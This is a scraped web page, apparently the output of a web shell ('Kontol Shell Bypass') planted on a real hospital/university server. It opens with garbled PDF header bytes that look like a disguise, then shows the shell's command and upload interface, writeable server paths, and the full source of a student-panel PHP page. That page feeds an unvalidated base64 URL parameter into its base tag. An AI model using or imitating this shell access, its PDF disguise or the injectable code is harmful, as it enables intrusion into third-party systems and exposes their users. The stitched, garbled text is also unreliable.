%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/shardalms/student-panel/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/shardalms/student-panel/index_old.php
<?php
	error_reporting(0);
	if(strpos($_SERVER['HTTP_HOST'],'localhost')!==FALSE){
		$protocol='http://';
    }else if(strpos($_SERVER['HTTP_HOST'],'arwadigital')!==FALSE){
		$protocol='http://';
	}else{
        $protocol='https://';
	}
	
	$url=$protocol.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
	
	$cdir=getcwd();
	$cdir=explode(DIRECTORY_SEPARATOR, $cdir);
	$cdir=end($cdir);
	$a=explode("/".$cdir, $url);
	$baseUrl=$a[0]."/".$cdir."/";

	$fbaseUrl=$_GET['url']?base64_decode($_GET['url']):$baseUrl;

	$gaCodeHead=file_get_contents($baseUrl.'api/lpage/gaCodeHead');
	$gaCodeBody=file_get_contents($baseUrl.'api/lpage/gaCodeBody');
	$gaCodeKey=file_get_contents($baseUrl.'api/lpage/gaCodeKey');
?>

<!DOCTYPE html>
<html lang="en" ng-app="MetronicApp" ng-controller="App">
<head>
	<meta charset="utf-8" />
	<base href="<?php echo $fbaseUrl?>" />

	<link rel="apple-touch-icon" sizes="76x76" href="<?php echo $baseUrl?>assets/img/apple-icon.png">
	<link rel="icon" type="image/png" sizes="96x96" href="<?php echo $baseUrl?>assets/img/favicon.png">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />

	<title ng-bind="PageTitle">Student Panel | Sharda University</title>

	<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' />
    <meta name="viewport" content="width=device-width" />
     <link rel="icon" href="<?php echo $baseUrl?>images/favicon.png" type="image/x-icon" />
	<!-- <link href="<?php echo $baseUrl?>css/form.css" rel="stylesheet" type="text/css"/>
	<link href="<?php echo $baseUrl?>css/quickaccord.css" rel="stylesheet" type="text/css"/> -->
    <!-- Bootstrap core CSS     -->
    <link href="<?php echo $baseUrl?>css/bootstrap.min.css" rel="stylesheet" />

    <!-- Animation library for notifications   -->
    <!-- <link href="<?php echo $baseUrl?>css/animate.min.css" rel="stylesheet"/> -->

    <!--  Paper Dashboard core CSS    -->
    <!-- <link href="<?php echo $baseUrl?>css/paper-dashboard.css" rel="stylesheet"/> -->

    <!--  CSS for Demo Purpose, don't include it in your project     -->
    <!-- <link href="<?php echo $baseUrl?>css/demo.css" rel="stylesheet" /> -->

    <!--  Fonts and icons     -->
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/latest/css/font-awesome.min.css" rel="stylesheet">
    <link href='https://fonts.googleapis.com/css?family=Muli:400,300' rel='stylesheet' type='text/css'>
    <!-- <link href="<?php echo $baseUrl?>css/themify-icons.css" rel="stylesheet"> -->

	<!-- Sat -->
	<link href="<?php echo $baseUrl?>app-theme/plugins/jquery-ui/jquery-ui.min.css" rel="stylesheet" />
	<link href="<?php echo $baseUrl?>app-theme/css/style.css?v3.01" rel="stylesheet" />
	<style type="text/css">
        .bodycover		{position:fixed; z-index:11002; width:100%; height:100%; left:0; top:0; background:#888; opacity:0.2}
        .ajaxloader		{width:60px; height:50px; line-height:50px; text-align:center; border:1px solid #8E44AD; border-radius:2px; position:fixed; z-index:11003; left:calc(50% - 30px); /*top:50%; transform: translateY(-50%);*/ top:30%; background:#eee; color:#555; font-size:30px;}
    </style>
	<!-- / -->

	<!-- Sat -->
	<script>
		var baseUrl="<?php echo $baseUrl?>";
		var VERSION='v3.01';
        var SITE_NAME="Student Dashboard";
        var API_URL=baseUrl+'api/';
		var gaKey='<?php echo $gaCodeKey;?>';
	</script>
	<!-- / -->
	<?php echo $gaCodeHead;?>
</head>
<body style="visibility:hidden">
	<?php echo $gaCodeBody;?>
	<!-- Preloader-->
    <div class="bodycover"></div><div class="ajaxloader"><i class="fa fa-spin fa-circle-o-notch"></i></div>
	<!-- / -->
	
	<div class="wrapper">
		<!--<div class="sidebar" data-background-color="white" data-active-color="danger" ng-if="isLogged">-->
		<div class="sidebar" data-background-color="white" data-active-color="danger">
			<div ng-include="'<?php echo $baseUrl?>views/tpl/sidebar.html?v3.01'" ng-controller="SidebarController"></div>
		</div>
		<div class="sidebar sidebar2" data-background-color="white" data-active-color="danger" ng-if="!isLogged">
			<div ng-include="'<?php echo $baseUrl?>views/tpl/sidebar_login.html?v3.01'"></div>
		</div>

		<div class="main-panel {{!isLogged?'main-panel2':''}}">
			<nav class="navbar navbar-default" ng-include="'<?php echo $baseUrl?>views/tpl/nav.html?v3.01'"></nav>

			<div ui-view class="content animate-view"><!-- Main content --></div>

			<footer class="footer" ng-include="'<?php echo $baseUrl?>views/tpl/footer.html?v3.01'"></footer>
		</div>
	</div>

	<!-- Alert Msg Modal -->
    <div class="modal fade" id="alertMsgModal" tabindex="-1" role="dialog" aria-hidden="true">
		<div class="modal-dialog">
			<div class="modal-content text-center">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
					<h4 class="modal-title"></h4>
				</div>
				<div class="modal-body">
				</div>
				
				<!--<div class="modal-footer">
					<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
				</div>-->
			</div>
		</div>
	</div>

	<!--popup-->
	<div class="container">
		<div class="row">
			<div class="col-md-12">
				<div id="myModal2" class="modal fade" role="dialog">
					<div class="modal-dialog">
						<!-- Modal content-->
						<div class="modal-content">
							<div class="modal-header">
								<button type="button" class="close" data-dismiss="modal">&times;</button>
								<h4 class="modal-title">Privacy Policy</h4>
							</div>
							<div class="modal-body">
								<p>Your personal information (Name, Email, State, Phone, Courses, specialization) submitted will not be sold, shared or rented to others. We use this information to send updates about the University, courses being offered and contact you, if requested or find it necessary. You may opt out of receiving our communication by calling us on the contact number or by clicking on the 'unsubscribe' link mentioned in the mails.</p>
							</div>
							<div class="modal-footer">
								<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
							</div>
						</div>
					</div>
				</div>
				<div id="myModal3" class="modal fade" role="dialog">
				<div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					<div class="modal-header">
						<button type="button" class="close" data-dismiss="modal">&times;</button>
						<h4 class="modal-title">Terms and Conditions</h4>
					</div>
					<div class="modal-body">
						<p>Application fee of SUAT is INR 1500/-, failing which your application will not be considered. The application fee is non-refundable. All offers available on the site are for limited period only. Before availing any offer please note its end date. Please note that the application fee, offers and last date for applying is at the discretion of Sharda University and can be altered at any time. Any changes, if may happen, shall be informed through the Universities website. Applicant must check the eligibility criteria before applying, failing which the application will not be considered. All the details entered by the applicant (including academic details) should be correct. At any later stage of the process, if it is found that details are fake, the applicant will be barred from admission to Sharda University. All admission to Sharda University will be through SUAT (Sharda University Admission test) only. Applicants are therefore requested not to entertain any third party claiming to provide admission in Sharda University. The System ID sent to the applicant should be kept handy for SUAT and further admission process.</p>
					</div>
					<div class="modal-footer">
						<button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
					</div>
					</div>
				</div>
				</div>
				<div id="myModal4" class="modal fade" role="dialog">
				<div class="modal-dialog">
					<!-- Modal content-->
					<div class="modal-content">
					<div class="modal-header">
						<button type="button" class="close" data-dismiss="modal">&times;</button>
						<h4 class="modal-title">Cashback Offer</h4>
					</div>
					<div class="modal-body">
						<ul class="cashback">
							<li>The candidates who have made the payment of INR 1200 as application fee are eligible to receive INR 200 Paytm Voucher.</li>
							<li>Paytm voucher will be sent on your registered Email ID and Mobile Number on or after 1st June 2018.</li>
							<li>Paytm Voucher cannot be redeemed for cash. No credit or change will be given on the unused portion of the Voucher.</li>
							<li>We are not responsible if the Paytm voucher sent to you is lost, stolen or used by someone else.</li>
							<li>Last date to avail the offer is 30 May 2018.</li>
						</ul>
					</div>
					</div>
				</div>
				</div> 		
			</div>
		</div>
	</div>
	<!--popup-end-->

	<!--   Core JS Files   -->
    <script src="<?php echo $baseUrl?>js/jquery.min.js" type="text/javascript"></script>
	<script src="<?php echo $baseUrl?>js/bootstrap.min.js" type="text/javascript"></script>

	<!-- <script src="<?php echo $baseUrl?>js/classie.js"></script> -->
	<!--  Checkbox, Radio & Switch Plugins -->
	<!-- <script src="<?php echo $baseUrl?>js/bootstrap-checkbox-radio.js"></script> -->

	<!--  Charts Plugin -->
	<!-- <script src="<?php echo $baseUrl?>js/chartist.min.js"></script> -->

    <!--  Notifications Plugin    -->
    <!-- <script src="<?php echo $baseUrl?>js/bootstrap-notify.js"></script> -->

    <!--  Google Maps Plugin    -->
    <!-- <script type="text/javascript" src="https://maps.googleapis.com/maps/api/js"></script> -->

    <!-- Paper Dashboard Core javascript and methods for Demo purpose -->
	<script src="<?php echo $baseUrl?>js/paper-dashboard.js"></script>

	<!-- Paper Dashboard DEMO methods, don't include it in your project! -->
	<!-- <script src="<?php echo $baseUrl?>js/demo.js"></script> -->

	<!-- <script src="http://code.jquery.com/jquery-1.12.4.min.js"></script> -->
	<!-- <script type="text/javascript" src="<?php echo $baseUrl?>js/quickaccord.js"></script> -->
	
	<!-- Sat -->
	<script src="<?php echo $baseUrl?>app-theme/plugins/jquery-ui/jquery-ui.min.js"></script>
	<!-- Angular JS -->
    <script src="<?php echo $baseUrl?>app-theme/plugins/angular/angular.min.js"></script>
    <script src="<?php echo $baseUrl?>app-theme/plugins/angular/angular-ui-router.min.js"></script>
    <script src="<?php echo $baseUrl?>app-theme/plugins/angular/angular-animate.min.js"></script>
	<script src="<?php echo $baseUrl?>app-theme/plugins/angular/ocLazyLoad.min.js"></script>
	
	<script src="<?php echo $baseUrl?>app-theme/plugins/angular/angulartics.min.js"></script>
	<script src="<?php echo $baseUrl?>app-theme/plugins/angular/angulartics-ga.min.js"></script>

    <script src="<?php echo $baseUrl?>app-js/config.js?v3.01"></script>
	<script src="<?php echo $baseUrl?>app-js/url_route.js?v3.01"></script>
	
	<!-- Other JS -->
	<script src="<?php echo $baseUrl?>app-theme/js/moment.min.js"></script>
    <script src="<?php echo $baseUrl?>app-js/util.js?v3.01"></script>
    <script src="<?php echo $baseUrl?>app-js/validation.js?v3.01"></script>
    <script src="<?php echo $baseUrl?>app-js/site.js?v3.01"></script>

    <!-- AngularJs Controllers -->
	<script src="<?php echo $baseUrl?>app-js/app.js?v3.01"></script>
	<script src="<?php echo $baseUrl?>app-js/register_login.js?v3.01"></script>
	<script src="<?php echo $baseUrl?>app-js/dashboard.js?v3.01"></script>
	<script src="<?php echo $baseUrl?>app-js/user.js?v3.01"></script>
	<script src="<?php echo $baseUrl?>app-js/application.js?v3.01"></script>
	<script src="<?php echo $baseUrl?>app-js/registration.js?v3.01"></script>
</body>
</html>

Kontol Shell Bypass